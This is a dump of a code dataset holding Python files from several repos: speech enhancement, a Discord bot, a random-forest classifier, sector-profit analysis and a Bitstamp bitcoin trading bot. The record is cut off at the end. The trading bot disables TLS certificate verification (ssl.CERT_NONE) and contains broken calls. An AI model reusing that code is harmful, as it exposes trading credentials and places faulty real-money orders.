"models.OdcPlan.objects.filter", "line_number": 639, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 639, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 639, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 641, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 641, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 641, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 661, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 661, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 663, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 663, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 663, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 664, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 685, "usage_type": "call"}, {"api_name": "forms.RegistrationForm", "line_number": 690, "usage_type": "name"}, {"api_name": "forms.RegistrationForm", "line_number": 697, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 706, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 709, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 713, "usage_type": "call"}, {"api_name": 
"django.core.urlresolvers.reverse", "line_number": 715, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 724, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 726, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 728, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 728, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 728, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 729, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 731, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 731, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 731, "usage_type": "name"}, {"api_name": "models.UserInfo", "line_number": 732, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 737, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 738, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 745, "usage_type": "call"}]} +{"seq_id": "4446840045", "text": "#!/usr/bin/env python3\n\n\"\"\"\nCreated on Tue May 1 20:43:28 2018\n@author: eesungkim\n\"\"\"\nimport os\nimport math\n\nimport librosa\nimport numpy as np\nimport scipy.io.wavfile as wav\nfrom utils.estnoise_ms import * \nfrom utils.utils import * \n\ndef MMSE_STSA(path_noisy_test, output_path_estimated_noisy_test, sr, noisy_test, NFFT, hop_length_sample, winfunc):\n\t\"\"\"Speech Enhancement using A Spectral Amplitude Estimator\n\t\"\"\"\n\t\n\tsmoothFactorDD=0.99\n\tmaxPosteriorSNR= 100 \n\tminPosteriorSNR= 1\n\t# the variance of the speech; lambda_x(k)\n\t#noisy\n\n\t# print(noisy_test.dtype)\n\tstft_noisy_test = librosa.stft(noisy_test, n_fft=NFFT, hop_length=hop_length_sample, window=winfunc)\n\tmagnitude_noisy_test, phase_noisy_test = divide_magphase(stft_noisy_test, power=1)\n\t\t\n\tpSpectrum = magnitude_noisy_test**2\n\n\t# estimate the variance of the noise using minimum statistics noise PSD estimation ; lambda_d(k). 
\n\testNoise = estnoisem(pSpectrum,hop_length_sample/sr)\n\t\n\taPosterioriSNR=pSpectrum/estNoise\n\taPosterioriSNR[aPosterioriSNR > maxPosteriorSNR] = maxPosteriorSNR\n\taPosterioriSNR[aPosterioriSNR < minPosteriorSNR] = minPosteriorSNR\n\n\tpreviousGainedaPosSNR=1 \n\t(nFFT2,nFrames) = pSpectrum.shape\n\ttotalGain =[]\n\tfor i in range(nFrames):\n\t\taPosterioriSNR_frame = aPosterioriSNR[:,i]\n\t\t\n\t\t#operator [2](52)\n\t\toper=aPosterioriSNR_frame-1\n\t\toper[oper < 0] = 0 \n\t\tsmoothed_a_priori_SNR = smoothFactorDD * previousGainedaPosSNR + (1-smoothFactorDD) * oper\n\t\t\n\t\t#V for MMSE estimate ([2](8)) \n\t\tV=smoothed_a_priori_SNR*aPosterioriSNR_frame/(1+smoothed_a_priori_SNR)\n\n\t\t#Calculate Gain function which results from the MMSE [2](7),(12).\n\t\tgain= smoothed_a_priori_SNR/(1+smoothed_a_priori_SNR) \n\t\tif any(V<1):\n\t\t\tgain[V<1] = (math.gamma(1.5) * np.sqrt(V[V<1])) / aPosterioriSNR_frame[V<1] * np.exp(-1 * V[V<1] / 2) * ((1 + V[V<1]) * bessel(0, V[V<1] / 2) + V[V<1] * bessel(1, V[V<1] / 2))\n\t\t\n\t\tpreviousGainedaPosSNR = (gain**2) * aPosterioriSNR_frame\n\t\ttotalGain.append(gain)\n\t\n\ttotalGain=np.array(totalGain)\n\n\tmagnitude_estimated_clean = totalGain.T * magnitude_noisy_test\n\tstft_reconstructed_clean = merge_magphase(magnitude_estimated_clean, phase_noisy_test)\n\tsignal_reconstructed_clean =librosa.istft(stft_reconstructed_clean, hop_length=hop_length_sample, window=winfunc)\n\tsignal_reconstructed_clean=signal_reconstructed_clean.astype('int16')\n\t\n\t# wav.write(output_path_estimated_noisy_test,sr,signal_reconstructed_clean)\n\n\treturn signal_reconstructed_clean, sr\n\ndef plot_signals(noisy_test,signal_reconstructed_clean,sr,NFFT,hop_length_sample):\n\n\tsignal_reconstructed_clean = np.float32(signal_reconstructed_clean)\n\tshow_signal(noisy_test,signal_reconstructed_clean,sr)\n\tshow_spectrogram(noisy_test, signal_reconstructed_clean,sr,NFFT,hop_length_sample)\n\n\t\nif __name__ == '__main__':\n\targs = parse_args()\n\tMMSE_STSA(args)\n\n", "repo_name": "rcaravaca/proyecto_procesamiento_de_sonido", "sub_path": "MMSE_STSA/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2871, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "librosa.stft", "line_number": 27, "usage_type": "call"}, {"api_name": "math.gamma", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "librosa.istft", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "28058245025", "text": "import ssl\r\nimport json\r\n\r\nimport websocket\r\nimport bitstamp.client\r\nimport credenciais\r\n\r\nQUANTIDADE = 0.001  # fixed trade size in BTC (an assumed placeholder value)\r\n\r\ndef cliente():\r\n    return bitstamp.client.Trading(username=credenciais.USERNAME, key=credenciais.KEY, secret=credenciais.SECRET)\r\n\r\n\r\ndef comprar(quantidade):\r\n    trading_client = cliente()\r\n    trading_client.buy_market_order(quantidade)\r\n\r\ndef vender(quantidade):\r\n    trading_client = cliente()\r\n    trading_client.sell_market_order(quantidade)\r\n\r\ndef ao_abrir(ws):\r\n    print(\"OPENED!\")\r\n\r\n    json_subscribe = \"\"\"\r\n    {\r\n        \"event\": \"bts:subscribe\",\r\n        \"data\": {\r\n            \"channel\": \"live_trades_btcusd\"\r\n            
}\r\n} \r\n\"\"\"\r\n ws.send(json_subscrible)\r\n \r\ndef ao_fechar(ws):\r\n print(\"FECHOU!\")\r\n\r\ndef erro(ws,erro):\r\n print(\"ERRO!\")\r\n print(erro)\r\n \r\n\r\ndef ao_receber_mensagem(ws, mensagem):\r\n try:\r\n print(\"MENSAGEM!\")\r\n mensagem= json.loads(mensagem)\r\n print(mensagem['data']['price'])\r\n\r\n global preco\r\n preco= mensagem['data']['price']\r\n if preco > 17000:\r\n vender()\r\n elif preco < 16000:\r\n comprar()\r\n else:\r\n print(\"AGUARDAR!\")\r\n\r\n except Exception as error:\r\n print(error)\r\n\r\n\r\nif __name__== \"__main__\":\r\n \r\n ws = websocket.WebSocketApp(\"wss://ws.bitstamp.net\",\r\n on_open= ao_abrir,\r\n on_message=ao_receber_mensagem,\r\n on_close=ao_fechar,\r\n on_error=erro)\r\n \r\n ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n ", "repo_name": "Leo-Drt/Bot_bitcoin", "sub_path": "bot_bitcoin.py", "file_name": "bot_bitcoin.py", "file_ext": "py", "file_size_in_byte": 1578, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "bitstamp.client.client.Trading", "line_number": 9, "usage_type": "call"}, {"api_name": "bitstamp.client.client", "line_number": 9, "usage_type": "attribute"}, {"api_name": "bitstamp.client", "line_number": 9, "usage_type": "name"}, {"api_name": "credenciais.USERNAME", "line_number": 9, "usage_type": "attribute"}, {"api_name": "credenciais.KEY", "line_number": 9, "usage_type": "attribute"}, {"api_name": "credenciais.SECRET", "line_number": 9, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 62, "usage_type": "call"}, {"api_name": "ssl.CERT_NONE", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "33176166475", "text": "from os import system\nfrom settings import config\nfrom settings.keep_alive import keep_alive\nfrom disnake import Intents, HTTPException, ApplicationCommandInteraction\nfrom disnake.ext import commands, tasks\nfrom utils.constants import RAPAX_GUILD\n\nif __name__ == \"__main__\":\n\n # Bots setup\n intents = Intents.default()\n intents.members = True\n bot = commands.InteractionBot(intents=intents,\n test_guilds=[RAPAX_GUILD])\n extensions = [\"moderation\", \"entertainment\", \"event\", \"nickname\"]\n for extension in extensions:\n try:\n bot.load_extension(\"extensions.\" + extension)\n except Exception as error:\n print(\"{} cannot be loaded. [{}]\".format(extension, error))\n\n # Bot test slash command\n @bot.slash_command(description=\"Pong!\")\n async def ping(inter: ApplicationCommandInteraction):\n await inter.response.send_message(\"Pong! 
`\" + str(round(bot.latency * 1000)) + \"ms`\")\n\n # Bot loop\n @tasks.loop(seconds=10.0)\n async def foo():\n return\n\n # Run bot\n try:\n keep_alive()\n bot.run(config.data[\"DISCORD_TOKEN\"])\n except HTTPException as e:\n if e.status == 429:\n print(\"Discord servers denied the connection: too many requests\")\n print(\"\\n\\n\\nBLOCKED BY RATE LIMITS\\nRESTARTING NOW\\n\\n\\n\")\n system(\"python ./settings/restarter.py\")\n system('kill 1')\n else:\n raise e\n", "repo_name": "Law7iet/RapaxBot", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "disnake.Intents.default", "line_number": 11, "usage_type": "call"}, {"api_name": "disnake.Intents", "line_number": 11, "usage_type": "name"}, {"api_name": "disnake.ext.commands.InteractionBot", "line_number": 13, "usage_type": "call"}, {"api_name": "disnake.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.constants.RAPAX_GUILD", "line_number": 14, "usage_type": "name"}, {"api_name": "disnake.ApplicationCommandInteraction", "line_number": 24, "usage_type": "name"}, {"api_name": "disnake.ext.tasks.loop", "line_number": 28, "usage_type": "call"}, {"api_name": "disnake.ext.tasks", "line_number": 28, "usage_type": "name"}, {"api_name": "settings.keep_alive.keep_alive", "line_number": 34, "usage_type": "call"}, {"api_name": "settings.config.data", "line_number": 35, "usage_type": "attribute"}, {"api_name": "settings.config", "line_number": 35, "usage_type": "name"}, {"api_name": "disnake.HTTPException", "line_number": 36, "usage_type": "name"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "27047716935", "text": "import argparse\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import f1_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report\n\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\n\n\ndef tuneRF(xTrain, yTrain):\n # Number of trees in random forest\n n_estimators = [int(x) for x in np.linspace(50, 500, num=5)]\n # Number of features to consider at every split\n max_features = ['sqrt', 'auto']\n # Maximum number of levels in tree\n max_depth = [int(x) for x in np.linspace(5, 30, num=5)]\n max_depth.append(None)\n # Minimum number of samples required at each leaf node\n min_samples_leaf = [1, 2, 4]\n parameters = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_leaf': min_samples_leaf,\n }\n\n model = GridSearchCV(RandomForestClassifier(), parameters, cv=5, scoring='f1_macro', verbose=1)\n model.fit(xTrain, yTrain)\n return model\n\n\ndef train_test(xTrain, yTrain, xTest, yTest):\n rf = RandomForestClassifier(random_state=42).fit(xTrain, yTrain)\n print(\"Parameter using: \\n\", rf.get_params())\n score(rf, xTest, yTest)\n print(\"\\nTuning:\")\n model = tuneRF(xTrain, yTrain)\n print(\"Best parameters: \\n\", model.best_params_)\n score(model, xTest, yTest)\n\n return model\n\n\ndef score(model, xTest, yTest):\n yHat = model.predict(xTest)\n print(classification_report(yTest, yHat))\n print(\"F1 score: \", 
f1_score(yTest, yHat))\n    return\n\n\n# def train_(xTrain, yTrain):\n\n\n# def test_(model, xTest):\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--train\",\n                        default=\"../data/Train.csv\",\n                        help=\"file name of the training dataset\")\n    parser.add_argument(\"--test\",\n                        default=\"../data/Test.csv\",\n                        help=\"file name of the testing dataset\")\n    args = parser.parse_args()\n    train = pd.read_csv(args.train)\n    test = pd.read_csv(args.test)\n\n    # separating x and y\n    yTrain = train['HeartDisease'].copy(deep=True)\n    xTrain = train.drop(columns=['HeartDisease'])\n    yTest = test['HeartDisease'].copy(deep=True)\n    xTest = test.drop(columns=['HeartDisease'])\n\n    # proper scaling\n    stdScale = StandardScaler().fit(xTrain)\n    xTrain = stdScale.transform(xTrain)\n    xTest = stdScale.transform(xTest)\n\n    # model = train_test(xTrain, yTrain, xTest, yTest)\n    rf = RandomForestClassifier(max_depth=17, max_features='auto', min_samples_leaf=2, n_estimators=50)\n    rf.fit(xTrain, yTrain)\n    metrics.plot_roc_curve(rf, xTest, yTest)\n    plt.show()\n\nif __name__ == '__main__':\n    main()\n\n# Fitting 5 folds for each of 180 candidates, totalling 900 fits\n# Best parameters: \n#  {'max_depth': 17, 'max_features': 'auto', 'min_samples_leaf': 2, 'n_estimators': 50}\n#               precision    recall  f1-score   support\n\n#            0       0.83      0.87      0.85       121\n#            1       0.91      0.88      0.90       182\n\n#     accuracy                           0.88       303\n#    macro avg       0.87      0.88      0.87       303\n# weighted avg       0.88      0.88      0.88       303\n\n# F1 score:  0.8969359331476322\n", "repo_name": "Lukas-Xue/Heart-Failure-Prediction", "sub_path": "code/rf.py", "file_name": "rf.py", "file_ext": "py", "file_size_in_byte": 3490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.linspace", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 52, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.metrics.plot_roc_curve", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "28892112824", "text": "'''\n    Process the data after it has been fetched\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport time\nfrom collections import defaultdict,Counter,namedtuple\nfrom untils import plotManyLines,fomartMonth,plotNowDiffer\n\n'''A collection of methods for processing the dependent variable'''\nclass dealY:\n    def __init__(self):\n        pass\n    def removeOutliers(self,date2Company2Profit):# remove outliers\n        showComs = []\n        # compute the total value for each quarter\n        date2Sum = {}\n        for oneDate 
in date2Company2Profit:\n            profits = 0\n            for oneCom in date2Company2Profit[oneDate]:\n                profits += abs(date2Company2Profit[oneDate][oneCom])\n            date2Sum[oneDate] = profits\n        # print(date2Sum)\n        \n        dates = sorted(list(date2Sum.keys()))\n        # plotManyLines(dates,[[date2Sum[i] for i in dates]],\"quarter\",\"profit\",\"sector profit\")\n        # get the companies that need to be displayed\n        x,ys1,com1 = self.showImportantC(date2Company2Profit,date2Sum,1)\n        x,ys2,com2 = self.showImportantC(date2Company2Profit,date2Sum,10)\n        # plotNowDiffer(x,ys1,ys2,com1,[])#=================================\n        # dates =list( date2Company2Profit.keys())\n        # dates.sort()\n        # for oneDate in dates:\n        #     comPro = []# (company name, profit)\n        \n        #     for oneCompany in date2Company2Profit[oneDate]:\n        #         comPro.append((oneCompany,date2Company2Profit[oneDate][oneCompany]))\n        #     comPro.sort(key=lambda x:x[1],reverse=True)\n        #     # print(len(comPro))\n        #     # largest gains\n        #     for index in range(min(1,len(comPro))):\n        #         showComs.append(comPro[index][0])\n        #         # dateCom.append((oneDate,comPro[index][0]))\n        #     # print(len(comPro))\n        #     # largest losses\n        #     comPro.sort(key=lambda x:x[1])\n        #     for index in range(min(1,len(comPro))):\n        #         showComs.append(comPro[index][0])\n        #         # dateCom.append((oneDate,comPro[index][0]))\n        #     # print(comPro[:10])\n        #     # break\n        # # examine all of the companies\n        # showComs = list(set(showComs))\n        # # fetch the data for these companies\n        # x = dates\n        # ys = []\n        # for oneCompanyName in showComs:\n        #     temYs = []\n        #     for onex in x:\n        #         try:\n        #             temYs.append(\n        #                 date2Company2Profit[onex][oneCompanyName]/date2Sum[onex]\n        #             )\n        #         except:\n        #             # print(onex,oneCompanyName)# mostly delistings\n        #             temYs.append(0)\n        #     ys.append(temYs)\n        # plot and take a look\n        # print(showComs)\n        # plotManyLines(x,ys,\"time\",\"profit/loss share of the market\",showComs)\n        # manual removals (dates,names)\n        # return []\n        # needR = [[20140331,'温氏食品集团股份有限公司'],[20140930,'獐子岛集团股份有限公司'],\n        #           [20141231,'獐子岛集团股份有限公司'],[20150331,'獐子岛集团股份有限公司'],[20220331,'江西正邦科技股份有限公司'],]\n        needR = [[20140331,'温氏食品集团股份有限公司'],[20140930,'獐子岛集团股份有限公司'],\n                [20141231,'獐子岛集团股份有限公司'],[20220630,'江西正邦科技股份有限公司'],[20220331,'江西正邦科技股份有限公司'],\n                [20211231,'温氏食品集团股份有限公司'],[20211231,'江西正邦科技股份有限公司'],]\n        # [20211231,'新希望六和股份有限公司'],\n        # [20211231,'天邦食品股份有限公司']]\n        # companys,dates = [],[]\n        # return companys,dates\n        return needR\n    \n    def quarterFix(self,date2Company2Profit,nextStep=4,dealK=0):# adjust quarterly profit growth and obtain the growth rate\n        quaters,values = [],[]\n        self.date2Company2Profit = date2Company2Profit\n        date_pairs = []\n        dates = sorted(list(self.date2Company2Profit.keys()))\n        # print(dates)\n        '''get the corresponding now date and pre date for each period'''\n        for index in range(len(dates)):\n            if index == 0:\n                continue\n            preStep = min(index,nextStep)\n            before,after = [],[]\n            for i in range(preStep):\n                before.append(dates[index-i-1])\n                after.append(dates[index-i])\n            date_pairs.append([dates[index],before,after])\n        # if nextStep ==4:\n        #     for i in date_pairs:\n        #         print(i)\n        #         print(len(self.dates2CompanySame(i[1],i[2])))\n        #     print(\"=======================\")\n        '''compute the absolute value for each data_pair'''\n        for oneQuater in date_pairs:\n            # print(oneQuater)\n            companys = self.dates2CompanySame(oneQuater[1],oneQuater[2])\n            quaters.append(str(oneQuater[0]))\n            # print(oneQuater[2],oneQuater[1])\n            # print(oneQuater[0],oneQuater[1],oneQuater[2])\n            after = self.sumprofits(oneQuater[2],companys)\n            before = self.sumprofits(oneQuater[1],companys)\n            before += dealK\n            after += dealK\n            # print(oneQuater[0],round((after-before)/abs(before),2),oneQuater[2],after,oneQuater[1],before)\n            # print((self.sumprofits(oneQuater[2],companys),self.sumprofits(oneQuater[1],companys)))\n            values.append(\n                (after-before)/abs(before)\n                # 
(self.sumprofits(oneQuater[2],companys)/self.sumprofits(oneQuater[1],companys))-1\n            )\n        # plotOne(quaters[37:-30],values[37:-30],\"date\",\"profit growth rate\")\n        return quaters,values\n\n    def quarter2Month(self,quarters,values):# interpolate the profit growth rate from quarterly to monthly\n        oneInfo = namedtuple('oneInfo','year,month,value,monthStr')\n        print(quarters)\n        quarterRate = []\n        monthes,newValues = [],[]\n        # convert to the month data format\n        for (index,oneQuarter) in enumerate(quarters):\n            oneQuarter = str(oneQuarter)\n            year = int(oneQuarter[:4])\n            month = int(oneQuarter[4:6])\n            quarterRate.append(oneInfo(year,month,values[index],oneQuarter[4:6]))\n        # interpolate\n        monthes.append(f\"{quarterRate[0].year}-{fomartMonth(quarterRate[0].month)}\")\n        newValues.append(quarterRate[0].value)\n        for (index,oneQuarter) in enumerate(quarterRate[1:]):\n            beforeQuarter,nowQaurter = quarterRate[index],oneQuarter\n            differ = (nowQaurter.value-beforeQuarter.value)/3# fixed value\n            for i in range(1,3):\n                monthes.append(f\"{oneQuarter.year}-{fomartMonth((beforeQuarter.month+i)%12)}\")\n                newValues.append(\n                    beforeQuarter.value+differ*i\n                )\n            monthes.append(f\"{nowQaurter.year}-{fomartMonth(nowQaurter.month)}\")\n            newValues.append(nowQaurter.value)\n        # plotOne(monthes[111:-90],newValues[111:-90],\"date\",\"net profit\")\n        return monthes,newValues\n    \n    # def getQuater2Monteh(date2Company2Profit):\n    #     quaters,values = [],[]\n    #     self.date2Company2Profit = date2Company2Profit\n    #     date_pairs = []\n    #     dates = sorted(list(self.date2Company2Profit.keys()))\n    def getProFitSelf(self,date2Company2Profit:dict):\n        monthes,values = [],[]\n        dates = list(date2Company2Profit.keys())\n        dates.sort()\n        for oneDate in dates:\n            values.append(sum(\n                [ date2Company2Profit[oneDate][i] for\\\n                    i in date2Company2Profit[oneDate]]\n            ))\n            monthes.append(oneDate)\n        return monthes,values\n\n\n    \n\n    ''' removeOutliers() -> get the companies to display'''\n    def showImportantC(self,date2Company2Profit,date2Sum,K):\n        showComs = []\n        dates =list( date2Company2Profit.keys())\n        dates.sort()\n        for oneDate in dates:\n            comPro = []# (company name, profit)\n            showProf = []\n            for oneCompany in date2Company2Profit[oneDate]:\n                comPro.append((oneCompany,date2Company2Profit[oneDate][oneCompany]))\n            comPro.sort(key=lambda x:x[1],reverse=True)\n            # largest gains\n            for index in range(min(K,len(comPro))):\n                showComs.append(comPro[index][0])\n                showProf.append(comPro[index][0])\n            # if oneDate == 20211231:\n            #     print(showProf)\n            # largest losses\n            comPro.sort(key=lambda x:x[1])\n            for index in range(min(K,len(comPro))):\n                showComs.append(comPro[index][0])\n                showProf.append(comPro[index][0])\n            # if oneDate == 20211231:\n            #     print(showProf)\n            # examine all of the companies\n        showComs = list(set(showComs))\n        # fetch the data for these companies\n        x = dates\n        ys = []\n        for oneCompanyName in showComs:\n            temYs = []\n            for onex in x:\n                try:\n                    temYs.append(\n                        date2Company2Profit[onex][oneCompanyName]/date2Sum[onex]\n                    )\n                except:\n                    # print(onex,oneCompanyName)# mostly delistings\n                    temYs.append(0)\n            ys.append(temYs)\n        # showComs.sort()\n        return x,ys,showComs\n    '''quaterFix() -> get the companies common to all dates'''\n    def dates2CompanySame(self,before,after):\n        dates = list(set(before)|set(after))\n        companys = []\n        for oneDate in dates:\n            companys.extend(list(\n                self.date2Company2Profit[oneDate].keys()\n            ))\n        sameCompanys = []\n        com2Num = Counter(companys)\n        for oneCompany in com2Num:\n            if com2Num[oneCompany] == len(dates):\n                sameCompanys.append(oneCompany)\n        return sameCompanys\n    '''quaterFix() -> compute the total profit'''\n    def sumprofits(self,dates,companyNames):\n        # print(dates)\n        temProfits = 0\n        for oneDate in dates:\n            for oneCom in companyNames:\n                if not np.isnan(self.date2Company2Profit[oneDate][oneCom]):\n                    temProfits += 
self.date2Company2Profit\\\n                    [oneDate][oneCom]\n        return temProfits\n\n    '''not used for now'''\n    def monthFix(self,monthes,values):# adjust monthly profit growth - currently unused\n        resMonth,upRates = [],[]\n        month2Value = {i:j for (i,j) in zip(monthes,values)}\n        for (index,oneMonth) in enumerate(monthes):\n            if index < 15:\n                continue\n            beforeMonth = [ monthes[index-i-3] for i in range(12)]\n            afterMonth = [monthes[index-i] for i in range(15)]\n            resMonth.append(oneMonth)\n            sum12 = sum([float(month2Value[i]) for i in beforeMonth])\n            sum15 = sum([float(month2Value[i]) for i in afterMonth])\n            absSum12 = sum([abs(float(month2Value[i])) for i in beforeMonth])\n            upRates.append(\n                (sum15-sum12)/absSum12\n            )\n            # print(oneMonth,beforeMonth,afterMonth)\n        # plotOne(resMonth,upRates,\"date\",\"net profit growth\")\n        return resMonth,upRates\n    def quarter2MonthProfit(self,quarters,values):# convert the profit rate from quarterly to monthly; not used for now\n        oneInfo = namedtuple('oneInfo','year,month,value')\n        quaterRate,monthProfit = [],[]\n        # extract the month information\n        for (index,oneQuater) in enumerate(quarters):\n            oneQuater = str(oneQuater)\n            year = int(oneQuater[:4])\n            month = int(oneQuater[4:6])\n            quaterRate.append(oneInfo(year,month,values[index]))\n        monthProfit.append(quaterRate[0])\n        # perform the interpolation\n        for (index,oneState) in enumerate(quaterRate[1:]):\n            beforeQuater,nowQauter = quaterRate[index],oneState\n            differ = (nowQauter.value-beforeQuater.value)/3# fixed value\n            for i in range(1,3):\n                monthProfit.append(\n                    oneInfo(nowQauter.year,(beforeQuater.month+i)%12,beforeQuater.value+differ*i)\n                )\n            monthProfit.append(nowQauter)\n        monthes,values = [],[]\n        # for oneRate in monthProfit[162:-90]:\n        for oneRate in monthProfit[162:-90]:\n            monthes.append(f\"{oneRate.year}-{oneRate.month}\")\n            values.append(oneRate.value)\n        # plotOne(monthes,values,\"date\",\"net profit\")\n        return monthes,values\n\nclass dealX:\n    def __init__(self):\n        pass\n    def do_TTM(self,monthes,values):# for monthly x\n        '''per the current understanding, simply take the average?'''\n        month2V = {i:j for (i,j) in zip(monthes,values)}\n        newValues ,newMonthes= [],[]\n        for i in range(len(monthes)):\n            # if i<12:\n            #     continue\n            up = min(i,12)\n            # print(monthes[i])\n            newMonth = monthes[i-up:i+1]\n            newValues.append(\n                # sum([month2V[i] for i in newMonth])/len(newMonth)\n                sum([month2V[i] for i in newMonth])/len(newMonth)\n            )\n            newMonthes.append(monthes[i])\n        # print(values)\n        # print(newValues)\n\n        return newMonthes,newValues\n    def do_value2Rate(self,monthes,values):\n        newMonthes,newVal = [],[]\n        # print(values)\n        for (index,oneMonth) in enumerate(monthes[1:]):\n            newRate = (values[index+1]-values[index])/values[index]\n            newVal.append(newRate)\n            newMonthes.append(oneMonth)\n        return newMonthes,newVal", "repo_name": "wangzihan11/paper_recreate", "sub_path": "量化基本面系列研究之三--“量化基本面”理论体系及农林牧渔行业案例-中信建投/复现代码/dealData.py", "file_name": "dealData.py", "file_ext": "py", "file_size_in_byte": 13563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.namedtuple", "line_number": 127, "usage_type": "call"}, {"api_name": "untils.fomartMonth", "line_number": 138, "usage_type": "call"}, {"api_name": "untils.fomartMonth", "line_number": 144, "usage_type": "call"}, {"api_name": "untils.fomartMonth", "line_number": 148, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 260, "usage_type": "call"}]} +{"seq_id": "4038169865", "text": "import time\r\nimport unittest\r\nimport sys\r\nimport os, config, 
